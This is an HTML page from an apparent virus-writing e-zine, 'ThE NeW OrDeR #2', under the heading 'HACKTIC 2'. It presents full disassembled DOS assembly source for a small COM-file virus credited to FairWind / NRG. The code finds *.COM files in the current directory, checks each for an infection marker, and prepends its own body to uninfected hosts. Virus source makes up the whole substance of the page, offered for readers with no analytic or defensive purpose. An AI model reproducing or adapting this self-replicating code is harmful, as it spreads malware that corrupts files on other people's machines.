<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>HACKTIC
2</strong></font></p>

<p align="left"><font color="#00FFFF"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind / NRG , nrgteam@mail.ru<br>
;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>tic segment<br>
org 100h<br>
assume cs:tic, ds:tic, es:tic<br>
</strong></font><font color="#FFFFFF"><strong>len equ offset
last-100h<br>
</strong></font><font color="#FFFFFF"><strong>start: mov bx,0fh<br>
mov ah,4ah<br>
int 21h<br>
mov dx,es<br>
add dh,10h<br>
mov es,dx<br>
push dx<br>
push si<br>
mov ah,26h<br>
int 21h<br>
mov di,si<br>
mov si,offset last<br>
push si<br>
mov ch,0feh<br>
rep movsb<br>
dec cx<br>
pop di<br>
mov dx,offset file<br>
mov ah,4eh<br>
jmp short find<br>
retry: mov ah,4fh<br>
find: int 21h<br>
jc nofile<br>
mov dx,9eh<br>
mov ax,3d02h<br>
int 21h<br>
xchg ax,bx<br>
mov dx,di<br>
mov ah,3fh<br>
int 21h<br>
add ax,len<br>
cmp byte ptr [di],0bbh<br>
je retry<br>
push ax<br>
xor cx,cx<br>
mov ax,4200h<br>
cwd<br>
int 21h<br>
pop cx<br>
mov dh,1<br>
mov ah,40h<br>
int 21h<br>
;<br>
nofile: push es<br>
pop ds<br>
retf<br>
;<br>
file db '*.COM',0<br>
last db 0c3h<br>
tic ends<br>
end start</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>
</body>
</html>
